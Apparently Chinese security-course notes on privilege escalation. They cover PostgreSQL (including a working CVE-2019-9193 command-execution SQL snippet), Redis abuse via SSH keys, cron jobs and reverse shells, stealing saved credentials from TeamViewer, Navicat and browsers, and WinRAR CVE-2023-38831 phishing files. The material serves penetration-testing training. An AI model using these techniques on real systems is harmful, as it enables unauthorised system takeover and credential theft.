DAY135权限提升-系统权限提升篇数据库提权PostsqlRedis第三方软件提权密码凭据钓鱼文件
一、演示案例-系统提权-数据库提权-Redis&PostgreSQL
PostgreSQL-默认5432端口
数据库到linux
条件:数据库用户密码
技术:CVE-2019-9193 UDF libc
手工提权
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
工具提权-MDUT
Redis-默认6379端口
数据库到Linux
条件:利用未授权或密码连接后执行
技术:写密钥ssh 计划任务 反弹shell CVE2022沙盒执行
复现搭建:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
tar xzf redis-2.8.17.tar.gz
cd redis-2.8.17
make
cd src
/redis-server
手工提权
参考文章:服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞_服务攻防数据库安全-CSDN博客
工具提权-MDUT
工具提权-RequestTemplate
二、演示案例-系统提权-第三方软件-TeamViewer&Navicat&WinRAR&浏览器
远控类:Teamviewer 向日葵 Todesk VNC Radmin等
密码类:各大浏览器 Xshell Navicat 3389 等
服务类:FileZilla Serv-u Zend等
文档类:Winrar WPS Office等
原理:
1、通过普通用户或Web用户收集或提取有价值凭据进行提升
2、通过普通用户或Web用户上传类似钓鱼文件等待管理提升
1、计算机用户(有用户权限要求):Teamviewer
2、计算机用户(有用户权限要求):NavicatPremium
3、计算机用户(有用户权限要求):浏览器密码凭据
4、计算机用户或WEB权限:Winrar(CVE-2023-38831)
参考地址:【漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)_winrar漏洞复现-CSDN博客